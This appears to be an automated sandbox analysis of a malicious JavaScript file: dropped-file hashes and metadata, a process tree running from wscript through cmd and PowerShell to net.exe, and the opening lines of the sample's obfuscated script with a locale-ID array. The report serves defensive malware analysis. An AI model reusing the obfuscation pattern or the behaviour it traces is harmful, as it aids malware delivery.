SSDEEP: | 6:YEQXJ2HX4W4AL9YUXjb24kF0YJSjqoAvJfbPtdPeUkwRe9:YvXKX4W4ApYUTbdnGDV8Ukee9 |
MD5: | 722F89D8EBE4DFED5A80FAEE521A7C59 |
SHA1: | FCC8A19047B4557529CDFFC29229B44B20CB3C5C |
SHA-256: | 09962702F3B8054DB2E52CF72499CFACE7C73B2C0D6D9DFBA61A9B4BBB6F3C37 |
SHA-512: | 0CBE47E3F3D3BD5DDFBAE1C0E91B785AFC438899F1DF778EEA3F8141D0E4CCA8B9E920ACDAB06B89D066D93F3C23FD1D39755BFBD0BEE68F23C9B1A398E27B97 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 287 |
Entropy (8bit): | 5.288733656671389 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX4W4AL9YUXjb24kF0YJSjqoAvJf21rPeUkwRe9:YvXKX4W4ApYUTbdnG+16Ukee9 |
MD5: | A12181BEBA6B8A376F171021B765E055 |
SHA1: | 70F1C39DC3956C836B5856D0A2881BD56C345A74 |
SHA-256: | E4CDCEE4D35B2E68F92FC575D7C6D0D7520146E7335229E90756E1D34B798AB4 |
SHA-512: | A07957F9612697D9C64FD90EF55BFE46E2752D624A15D9A4ECA9438719D94BF8950D09DB7BB84597744B46C868113416213E62EA0F09DE3E39081B7DFAB010BF |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1090 |
Entropy (8bit): | 5.659807454845265 |
Encrypted: | false |
SSDEEP: | 24:Yv6X4WkUXmamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSwx:YvJWkwoBgkDMUJUAh8cvMwx |
MD5: | A2777823BAED172B2F137C6AEA27F12E |
SHA1: | C975425030F3664FB2C62C518AB83B74D86854D2 |
SHA-256: | 82E6EBE371F73331479CFA7C987708A1819C374A56738E33B0E439C2922C0FA9 |
SHA-512: | 549AA57B1C81621E5197DCE36AC0D16207EFA9DFDFF9CA279539CD46D19ADD98000B36076E4211E74D5F614BD37A908090E38748001FECA4A2335DC0C3AFBAA0 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 286 |
Entropy (8bit): | 5.264128074072613 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX4W4AL9YUXjb24kF0YJSjqoAvJfshHHrPeUkwRe9:YvXKX4W4ApYUTbdnGUUUkee9 |
MD5: | EA9F9C43CA6C46723ED1FD3C632F8488 |
SHA1: | F18873CCBFCA35E20D1AEA6C36BB7D20071E92D2 |
SHA-256: | ED4CD8D412C6E6A11AD22CA5FA7FF3D61E3731049FE5F08949AA30151005FDBA |
SHA-512: | 93ECA4F58BC94FC5C7378A76FE10A7B7D758F4076411CBA480E181F76329547044799093DDBA6B7958494B15653B452044D7E8350D1FA9AE7B70B7364F709557 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 282 |
Entropy (8bit): | 5.282333066010688 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX4W4AL9YUXjb24kF0YJSjqoAvJTqgFCrPeUkwRe9:YvXKX4W4ApYUTbdnGTq16Ukee9 |
MD5: | AD4B0DD7A631ADC4566638C62FDEBB28 |
SHA1: | 293F112CB74899A04F0A9C7168AF7877677DF5FC |
SHA-256: | F4A144C8F37B218115C04E32A58EEF2FF9A5DC8AC61E1E6BB517E40A34AB2599 |
SHA-512: | 1E8254E6CAB8128139C25DF374DD86241DDE00B922227C99EA9E632665E93FA6CB67DA6526140A7A5E899065A092877255B50B21D52B2F87148155A79E85D91D |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4 |
Entropy (8bit): | 0.8112781244591328 |
Encrypted: | false |
SSDEEP: | 3:e:e |
MD5: | DC84B0D741E5BEAE8070013ADDCC8C28 |
SHA1: | 802F4A6A20CBF157AAF6C4E07E4301578D5936A2 |
SHA-256: | 81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06 |
SHA-512: | 65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2814 |
Entropy (8bit): | 5.136063602167697 |
Encrypted: | false |
SSDEEP: | 48:Y7eKyBeW0K/PBJeyudDb7vbI1MuABPZwtgW9xG79:LkdKXBuRDBPBce |
MD5: | 246E91E4EFBD625F5F134AA4D002BF28 |
SHA1: | 7E53077CBC9F93B5B9E50DC028655EC23DBE63A5 |
SHA-256: | F10FD08090998307B2372F11C7CB7580BB097E180E5B3252BC94411CD73BC027 |
SHA-512: | 4665F8D95CE966CCA8EDA241DA289E65409F4F9BEC1C7F5F5B891451013FE983FDD4BDC18B1EFBF5A8FB42321D09074AB5E1B8288B88DCAE9A8EC303BCBFCE8D |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 12288 |
Entropy (8bit): | 1.3197314370866904 |
Encrypted: | false |
SSDEEP: | 24:TLKufx/XYKQvGJF7urs9O3KaiZ3FL63FLesb+sZobF16R6FdpqpQ6YIyB+EXSqXW:TGufl2GL7msUKB0M0+Tb608YIyMrgyT |
MD5: | 79149F4C11BD55E425AB5EDCF1C7EE2D |
SHA1: | 6A56EE7AED2D4444B536BF9651E0A1A0D40E1331 |
SHA-256: | 4224FD110339A8070C473A8F7329A990E40E366784135F44A4B66D319EF92824 |
SHA-512: | 860FD66DF02CDB0B16435F58863B9ADAD27518C98BBE15465858459FA8FC88520289BBFD6E3B7EB33A95D6E4D08EBD4C965F1AC613A9A30D24C1FA8EEF5E7259 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 1.7810909049414567 |
Encrypted: | false |
SSDEEP: | 48:7McWKB0M0+Tb608YIyhrGKfqFl2GL7msV:7fFb608YISfKVmsV |
MD5: | DD44F377A03FD728183D9B576A29B1A2 |
SHA1: | 9C9F4FA4ACF0FE6DA84CD18BE058D4828E0B5FFD |
SHA-256: | CBCF2CDB991AD2098F373F2FB32A8DC3A38D610C033D0B009E9A50FDF883C18B |
SHA-512: | C2400A93661281D76EF7DB4AD9C331CF64AC3F0E79FF6BA0C81FD67CDA71025B120DE76F9CE6ABE769092AE7D6A3CF4340E08D8B971DC6240F60637ABC40F254 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 66726 |
Entropy (8bit): | 5.392739213842091 |
Encrypted: | false |
SSDEEP: | 768:RNOpblrU6TBH44ADKZEgQ11Ss3/hmldGH5jWtXPnbQQYyu:6a6TZ44ADEQ1nmlkH9Wt/vK |
MD5: | 3364FC339FCBDFEFEB24F02A83D54657 |
SHA1: | 1CEE0EE826B9BFFA8AB25BE3935B48C2BDFE09AD |
SHA-256: | 504EE02F9E3D6CAF1BF82A4FF32D84F8147DDE06B80490469DECCD521AB5D5FF |
SHA-512: | 46EFBAC875A7E8B4B7394286DD81E1C2EB6A6B3A52B5407B7C91DFD49AC26D4DD73CBE2491B7B64D654883D4FF134813DB8A97812B0EE3FFA5C13C950C376041 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 1.1940658735648508 |
Encrypted: | false |
SSDEEP: | 3:NlllulVmdtZ:NllUM |
MD5: | 013016A37665E1E37F0A3576A8EC8324 |
SHA1: | 260F55EC88E3C4D384658F3C18C7FDEF202E47DD |
SHA-256: | 20C6A3C78E9B98F92B0F0AA8C338FF0BAC1312CBBFE5E65D4C940B828AC92FD8 |
SHA-512: | 99063E180730047A4408E3EF8ABBE1C53DEC1DF04469DFA98666308F60F8E35DEBF7E32066FE0DD1055E1181167061B3512EEE4FE72D0CD3D174E3378BA62ED8 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 246 |
Entropy (8bit): | 3.4953527754662135 |
Encrypted: | false |
SSDEEP: | 6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8EebClEDliflH:Qw946cPbiOxDlbYnuRK+bD5iflH |
MD5: | 4DC6E2019FC13C3D026FE57F4F5A9606 |
SHA1: | FC29BEEF0B3DF9AB17D2B08F542B0140E9D1D947 |
SHA-256: | 3E5AD3362A4B744729EC33ED202CEFB214EB740EAE1D8447A681EEC4C29D54F3 |
SHA-512: | FAD0E9B190B501E4A5D59D5A89DA82DE139B15C2A87ABE376B99F14BB1CD36C89E52A13C69B26FBE351E8FD8537FAAC737E2252FBCFEF5713B59D20A1B21E22B |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-01-10 11-07-27-464.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16525 |
Entropy (8bit): | 5.361022727805069 |
Encrypted: | false |
SSDEEP: | 384:cBD67lQV4j1MOuD/btX+wknz+fzTqyorqz3tVFr84AbAYpfFWbWt+Fjwn0z5O+Wf:4M5 |
MD5: | 70A2D078BEFD5E910EE035832171B399 |
SHA1: | 1AB91914ECD7852E512C73437D30013594A16FB0 |
SHA-256: | 2B55DE84E5446FD295128DAD5827122E98AC784F96A1F422B711B14E8F7DB1ED |
SHA-512: | 9FF36D4E320A8791AB0B87F24CAB4CBE777D9E8A3A64D26AF419132CDFDFCCD9A253EE9854032C4C87C546187951077F869CBCBDC9513278C557FC4895C7DBBC |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 15114 |
Entropy (8bit): | 5.363988132489207 |
Encrypted: | false |
SSDEEP: | 384:VgZuR/ofzQZroCm3akIa2VQLmZXgwWuYGpOQiKwctMxZbGrQ6P0s6D6nuDpL69Nh:oyN |
MD5: | 4D191E320C11C5600475F1FCC8531AE7 |
SHA1: | BB8C29C440C3511FFC5403E7F75F8D0F23F82591 |
SHA-256: | 76B4D8708ADD233C060CD785B5A23EFF684362F14AE44C3A2BE7F527D7B1B48E |
SHA-512: | E79FA8E858AAB7FB7282D0B1039E665AF10C49A12D7BC7F600F5D766AEB4109F3E374E7948DFE0E8F5804976B039453466908A2D9E80684D27C8706B485F0ADF |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 29752 |
Entropy (8bit): | 5.398513355016559 |
Encrypted: | false |
SSDEEP: | 192:zcbaIGkcbIcbiIICcbBOQQ0fQNCHPaPOhWPOA3mbSAcbsGC9GZPOdIzZMJzV3ZmC:EGvIcNYdKtFB6 |
MD5: | 458E3BA4025BF0FF6A03DE96064C59CA |
SHA1: | B0C2CB19052626C6BB43915868EEAFB01968426C |
SHA-256: | 98D1AC36F66FEC611082154442F06C3F9F63491ABC981709126A579D877269BF |
SHA-512: | D6AA91534AB5CE7B0A0D77E332714FB9069BC2982DBB7A1D8A8558B4F89DCBFC37CAE2495B284052C73D4A27B5D9435E6C21A4E9245E8DCD53A5A713E350811B |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 758601 |
Entropy (8bit): | 7.98639316555857 |
Encrypted: | false |
SSDEEP: | 12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg |
MD5: | 3A49135134665364308390AC398006F1 |
SHA1: | 28EF4CE5690BF8A9E048AF7D30688120DAC6F126 |
SHA-256: | D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B |
SHA-512: | BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1407294 |
Entropy (8bit): | 7.97605879016224 |
Encrypted: | false |
SSDEEP: | 24576:/yKwYIGNPQbdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07WWL07oXGZd:bwZG2b3mlind9i4ufFXpAXkrfUs0qWLk |
MD5: | D1BC27E013E1129B27D3BE5F4567D495 |
SHA1: | D2D1B846698798C80E57917477F7B98054B48925 |
SHA-256: | 3EF526805CA6690C3E477DFD81BFD4B28B8D82CCA8E3641C3EDA0EC37F332DDC |
SHA-512: | EBCEFA11F5BC59D602D90177B460B0F0DA59534D347FFBAF1A7C78118A3A221A02284E0A34164F6C0710C1B4E88504C4A20DA69AC998B5EE613A017B208316CB |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 386528 |
Entropy (8bit): | 7.9736851559892425 |
Encrypted: | false |
SSDEEP: | 6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m |
MD5: | 5C48B0AD2FEF800949466AE872E1F1E2 |
SHA1: | 337D617AE142815EDDACB48484628C1F16692A2F |
SHA-256: | F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE |
SHA-512: | 44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1419751 |
Entropy (8bit): | 7.976496077007677 |
Encrypted: | false |
SSDEEP: | 24576:/nZwYIGNPzWL07oYGZfPdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:fZwZG5WLxYGZn3mlind9i4ufFXpAXkru |
MD5: | F43041C007C55C623135DD65EBCBE292 |
SHA1: | 0F5781369DB2C967A1795898030244B2E9D561F6 |
SHA-256: | 4F7827EA2E3ACAA6A1B5BC7969516DD8EF08AC789E9C5FBCE61A71D0553C2B8D |
SHA-512: | E5D1D615B902E4D66FD550BDF1418FE7D70BC08548EA006891F90CB183299D6700547205A3F2FEED6AE2C2F3A95B5F094356E4FB5451A36C4555CBFABE4D44F5 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 635764 |
Entropy (8bit): | 7.929592005409041 |
Encrypted: | false |
SSDEEP: | 12288:+ZLfaHa9wphzjERQ/JTckor+EURE+AwAX75pfGJKsKca+e7lEjYQ:+ZyjgQRRor+lRJAwAXlpoKgQ76jYQ |
MD5: | 91A2AF9E2A61ABF7D9977999FBF9879E |
SHA1: | F6E4FA02DD15B27F74553FB1B220A4D2DF385267 |
SHA-256: | FC3518D746CDB3738DA976551795B9727619F41F89AC0641533126E2F69B969A |
SHA-512: | 8B27CC0E0E902ABB59735FF4FC67789C0F0F9A1BF3F619A7AFAEAAA13A9AFCF9C82F25596719A65EC15221EBAE16EF9701CDB48F372BBF1BE08CB568DBE41D7C |
Malicious: | true |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 98682 |
Entropy (8bit): | 6.445287254681573 |
Encrypted: | false |
SSDEEP: | 1536:0tlkIi4M2MXZcFVZNt0zfIagnbSLDII+D61S8:03kf4MlpyZN+gbE8pD61L |
MD5: | 7113425405A05E110DC458BBF93F608A |
SHA1: | 88123C4AD0C5E5AFB0A3D4E9A43EAFDF7C4EBAAF |
SHA-256: | 7E5C3C23B9F730818CDC71D7A2EA01FE57F03C03118D477ADB18FA6A8DBDBC46 |
SHA-512: | 6AFE246B0B5CD5DE74F60A19E31822F83CCA274A61545546BDA90DDE97C84C163CB1D4277D0F4E0F70F1E4DE4B76D1DEB22992E44030E28EB9E56A7EA2AB5E8D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 737 |
Entropy (8bit): | 7.501268097735403 |
Encrypted: | false |
SSDEEP: | 12:yeRLaWQMnFQlRKfdFfBy6T6FYoX0fH8PkwWWOxPLA3jw/fQMlNdP8LOUa:y2GWnSKfdtw46FYfP1icPLHCfa |
MD5: | 5274D23C3AB7C3D5A4F3F86D4249A545 |
SHA1: | 8A3778F5083169B281B610F2036E79AEA3020192 |
SHA-256: | 8FEF0EEC745051335467846C2F3059BD450048E744D83EBE6B7FD7179A5E5F97 |
SHA-512: | FC3E30422A35A78C93EDB2DAD6FAF02058FC37099E9CACD639A079DF70E650FEC635CF7592FFB069F23E90B47B0D7CF3518166848494A35AF1E10B50BB177574 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 55 |
Entropy (8bit): | 4.306461250274409 |
Encrypted: | false |
SSDEEP: | 3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y |
MD5: | DCA83F08D448911A14C22EBCACC5AD57 |
SHA1: | 91270525521B7FE0D986DB19747F47D34B6318AD |
SHA-256: | 2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9 |
SHA-512: | 96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 4.915260548903893 |
TrID: | |
File name: | 28152172202187913252.js |
File size: | 20'779 bytes |
MD5: | 594d9046ffad1a442089844f89d245f4 |
SHA1: | 9f9c44083baef4cdd794727506c74fa4bf4cac1d |
SHA256: | 2762a5dc0c5bf93ecc0906fc51c9a69d12c1ddb8e9dd4cbc0667382ed93c0bfa |
SHA512: | a69588dac97c1b6ac16c88c47bde2a1f0d7987d0f1321fc08317191766fb00864e9077cfe585a3cd67b242838b3e3f9c89c0a761bebffbfade1cbee3835707f0 |
SSDEEP: | 384:WCVcxDcV9EMSmSgS+01xbTaMLlaiQEg93WFg8UGh0WRT39lnRfv7aMHsh+VNfqPS:WZ9MSmSgS+01dWMLlayFfqPBqGPqJju6 |
TLSH: | 3D929861D4A6425FC5F8177C0DEB0CE12089960A06ED902D49A374CE6E9FFA53AF78F4 |
File Content Preview: | function hyedbktd(){tbzqwwh=[1031,3079,5127,4103,2055,3072];var iaevroqsn=this[wvfqmpmlx+qlitcs+xecfw+ecobz+zsrgc+oyiqbsqc+cbgewwpsf+yaursguxi](this[sywkav+xoljwmix+aqwxlvw+xecfw+riasisqw+wvfqmpmlx+yaursguxi][kdcmais+xecfw+zsrgc+qlitcs+yaursguxi+zsrgc+kry |
Icon Hash: | 68d69b8bb6aa9a86 |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 11:07:18 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\wscript.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7092c0000 |
File size: | 170'496 bytes |
MD5 hash: | A47CBE969EA935BDD3AB568BB126BC80 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 2 |
Start time: | 11:07:18 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7c8b10000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 3 |
Start time: | 11:07:18 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff620390000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 4 |
Start time: | 11:07:18 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7b2bb0000 |
File size: | 452'608 bytes |
MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 5 |
Start time: | 11:07:24 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff64eb90000 |
File size: | 5'641'176 bytes |
MD5 hash: | 24EAD1C46A47022347DC0F05F6EFBB8C |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 6 |
Start time: | 11:07:24 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7c8b10000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 7 |
Start time: | 11:07:24 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\net.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff66e470000 |
File size: | 59'904 bytes |
MD5 hash: | 0BD94A338EEA5A4E1F2830AE326E6D19 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 8 |
Start time: | 11:07:24 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff63ec50000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 9 |
Start time: | 11:07:24 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7df220000 |
File size: | 55'320 bytes |
MD5 hash: | B7F884C1B74A263F746EE12A5F7C9F6A |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 10 |
Start time: | 11:07:25 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff63ec50000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Call Graph
Graph
- Executed
- Not Executed
Script: |
---|
Code | ||
---|---|---|
0 | function hyedbktd() { |
|
1 | tbzqwwh = [ 1031, 3079, 5127, 4103, 2055, 3072 ]; | |
